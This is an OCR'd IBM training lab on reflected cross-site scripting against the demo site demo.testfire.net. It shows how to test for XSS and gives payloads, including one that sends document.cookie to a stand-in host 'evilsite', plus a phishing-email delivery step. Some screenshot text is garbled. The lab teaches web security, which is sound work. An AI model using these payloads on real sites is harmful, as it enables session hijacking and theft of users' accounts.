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Lab 2Steal the User Cookie 


In the training material we talked about how a Cross Site Scripting attack can be used to gain access to 
sensitive information such as user session cookies. In this lab we will use a script to get access to your 
cookies and discuss how this concept could be used to retrieve other user’s cookies. 


First we are going to show that the application is susceptible to cross site scripting, and launch a script to 
get access to your cookies for the current session, and finally discuss how we can inject a script into a 
users browser, without their knowledge, to retrieve their cookies. 


In this lab you will play the role of a malicious user. 


Lab Overview 

e 2.1 Determine the best attack method 
a. How dol force the client to run my commands? 
b. What language are almost all computers able to execute? 

e 2.2 Find the application vulnerability 
a. Where might | be able to include content within an application? 
b. What does the payload look like? 
c. How dol access the client cookie? 

e 2.3 Exploit 
a. Discussion Topic 


i. How do 1 send this cookie from the victim to the attacker? 
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1.1 Determine best attack method 


__1. Launch Mozilla Firebox (there is a shortcut on the desktop) 


Mozilla Firefox 











__2. Goto http://demo.testfire.net 


__3. Enter ina search string Super Bowl in the text box and select Go button 





__4. Review Return Results 





Search Results 


No results were found for the query: 





Super Bowl 





Return Results 


This is how a hacker will profile the site to try and learn how the 


user interacts with the application and how the application reacts 
tL to the user input. 


We learn the search string is reflected on the page — in this case 
we see Super Bowl which is what we typed in the search box 


Page 2 Lab 2 — Steal Cookie 
© 2007 IBM Corporation 


BM cen 


2.1 Find the application vulnerability 


__1. Now enter in the following into the search string <B>Super Bowl</B> in the text box and select 
Go button 





Search|i<B>Super Bowl</B> 


<B></B> are the html tags which tell the browser to render the 
enclosed string in BOLD. 


__2. Review Return Results 





Search Results 


No results were found for the query: 


Super Bowl 








Return Results 


If the application renders <B>Super Bowl</B> as is, the 
application is NOT susceptible to Cross-Site Scripting since it 
has neutralized the HTML meta characters so that they are 
properly displayed just as the user had input them. 


If we see only Super Bowl rendered in bold, then we know that 
the application is not properly handling the html tags entered 
since the application echoed them back as is, without encoding 
them appropriately since. 


Since we see Super Bowl in bold, we know that the browser has 
executed the tags, as opposed to displaying them. Now the 
hacker can try a more complex 
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__3. Enter in a more complex search — a test script 


__a. Inthe search text box type in <script>alert(1)</script> and select Go Button 





Return Results 


We learn the that the output is not encoded and the script tag is 
executed by the browser 


__c. Click the OK button to close the cookie information 


__4. Use the same approach but access your cookie 


__a. Inthe search test box type in <script>alert(document.cookie)</script> and select the Go 
Button 


__b. Review Return Results 
The page at http: /demo.testlire.net says: 


amnUserinfo=UserNane=anitaxhobPassword=7Gytbze yhrizO=etApproved=1 | 
amsessionid=131941 10348 





Return Results 


We learn the that the cookie is available to the javascript. 


**Note your cookie data may have a different value then the 
above screen shot. 


__c. Click OK button to close message 
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2.2 Exploit 


__1. Exploit the Cookie Information 


- Social Engineering 
Can we entice the user to click on a link in an email we send 
them? 


__a. From the Mozilla Firefox Menu, choose Tools -> Tamper Data to launch the Tamper Data 
plug-in 


Error Console 
Page Info 


Clear Private Data... Ctrl+Shift+Delete 


A ae eee a - Ongoing requests 


Start Tamper Stop Tamper Clear 





@ 
Tamper data utility will open. 
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__b. Return to Mozilla Firefox and In the search text box type in <script>document.write(‘<img 
src=http://evilsite/"+document.cookie);</script> and select the Go button 


The above javascript once it is injected into the search parameter 
will be echoed back to the browser and executed. This will result 
tL in a URL request, via the image tag, however the request will 
actually send a request to evilsite with your cookie appended to it 


__c. Review Results 


Search Results 


No results were found for the query: 





__d. Goto the Tamper Data GUI and locate and highlight the request you just made to evilsite, 
do you see your cookie(s) being sent to it? 


j ee et gt Ta 


Sart Tamper Shop Jarger 





bhp: (aor. beatline rete cee LAO eA 
Att: / demo bestia wnehisuberibe pf =| LOD _ OGL, 
ith: /idenno beatling rettenarchoapactt... OAD OCKOUIMENT... 
ifs, 125 "3 Bttp: (deme besthire west cre ODS, 
13: 2e46.158 i G Ping: (ovine (arn tee leioierileme=... LOAD _OeMAL 

















Piguet Heuser Vin 

Gere bestfire west 

Pei PS) (eiracbeers: Li: Weirdest: eet | 8.15) Cel... 5 Tiss, 24 da DOO? ITE] GMT 
hectyberl, spike stiory tera) angie han hind+-send bext hited; q=(), 9, bextip. ... ie Rio este -f1S/0.0 

ar, a o97=0.5 = Fr AS MET 

Bop del lata Compa 2.050727 
TS | at q=0), 7, *;9=0,7 


LE i 

hey ne x . ai 
4 ay. bextihied; charcet=utf 

war 





One way of exploiting this vulnerability is to send an email to the e. 
targeted user with a link with the above script embedded in it. If 
o the user clicks on it, the request will be sent to the web 
application, demo.testfire.net, with the script as input for the 
search box, when the script is echoed back by the application, it 
will be executed by the browser and the user cookies will be sent 
to the evilsite application. 


Close Tamper Data utility 


__f. Close Firefox browser 
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